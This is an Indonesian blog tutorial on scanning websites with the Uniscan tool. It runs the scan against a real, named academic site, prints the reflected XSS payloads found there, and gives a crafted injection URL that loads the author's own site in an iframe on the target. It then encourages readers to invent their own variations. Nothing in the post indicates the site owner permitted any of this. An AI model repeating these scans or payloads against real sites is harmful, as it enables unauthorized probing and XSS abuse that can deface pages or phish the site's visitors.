Tips dan Trik

[tips and trick][bsummary]

Hiburan

[hiburan][twocolumns]

Tutorial Scan Website Menggunakan Uniscan

sesuai judul di atas , ane akan posting tentang scan web dengan uniscan . uniscan adalah salah satu vulnerability assessment di backtrack yang berbahasa perl. kegunaan nya adalah mencari bug xss,sqli,rfi/lfi pada suatu situs , langsung ajah ! buka console atau klik ctrl+alt+T

ariez@ganteng:~# cd /pentest/web/uniscan

 ariez@ganteng:/pentest/web/uniscan# perl uniscan.pl





di situ sudah ada petunjuk 

####################################
# Uniscan project                  #
# http://uniscan.sourceforge.net/  #
####################################
V. 6.2


OPTIONS:
    -h     help
    -u     <url> example: https://www.example.com/
    -f     <file> list of url's
    -b     Uniscan go to background
    -q     Enable Directory checks
    -w     Enable File checks
    -e     Enable robots.txt and sitemap.xml check
    -d     Enable Dynamic checks
    -s     Enable Static checks
    -r     Enable Stress checks
    -i     <dork> Bing search
    -o     <dork> Google search
    -g     Web fingerprint
    -j     Server fingerprint

usage:
[1] perl uniscan.pl -u http://www.example.com/ -qweds
[2] perl uniscan.pl -f sites.txt -bqweds
[3] perl uniscan.pl -i uniscan
[4] perl uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
[5] perl uniscan.pl -o "inurl:test"
[6] perl uniscan.pl -u https://www.example.com/ -r
dalam tutorial ini ane gunain usage: [1] yaitu  uniscan.pl -u http://www.example.com/ -qweds

langsung saja , ane mengambil situs  : http://www.scielo.org/

ketik:

ariez@ganteng:/pentest/web/uniscan# perl uniscan.pl -u http://www.scielo.org/ -qweds


bersabarlah sampai menunggu proses bekerja ,  dan ternyata di temukan bug xss pada situs tersebut.

[+] Vul [XSS] http://www.scielo.org/php/index.php?lang=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">              
| [+] Vul [XSS] http://www.scielo.org/php/index.php?lang="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">

 dan tugas dah selesai :)
langsung ane test dengan xss injection ! ane ganti urlnya menjadi

http://www.scielo.org/php/index.php?lang="><body+bgcolor%3D"black"><iframe+align%3D"left"+scrolling%3D"yes"+frameborder%3D"0"+width%3D"1400"+height%3D"1000"+src%3D"http%3A%2F%2Fhantulaut.web.id%2F"+style%3D"border%3A0px+solid+#ccc"></iframe>tor

dan langsung dah terbuka situs ane :p http://hantulaut.web.id/ ! atau bisa agan kreasikan sendiri , ;) mohon maaf jika ada salah dalam tutorial ini , ane mohon maaf :*

Penulis bernama lengkap Aris Sando Hamzah, S.Pi lahir di Ambon pada tahun 1994. Saat ini penulis berdomisili di Kota Kendari, Provinsi Sulawesi Tenggara Indonesia.

No comments:

Post a Comment

komputer

[komputer][bigposts]

Ispiratif

[inspirasi][bsummary]

IT

[IT][twocolumns]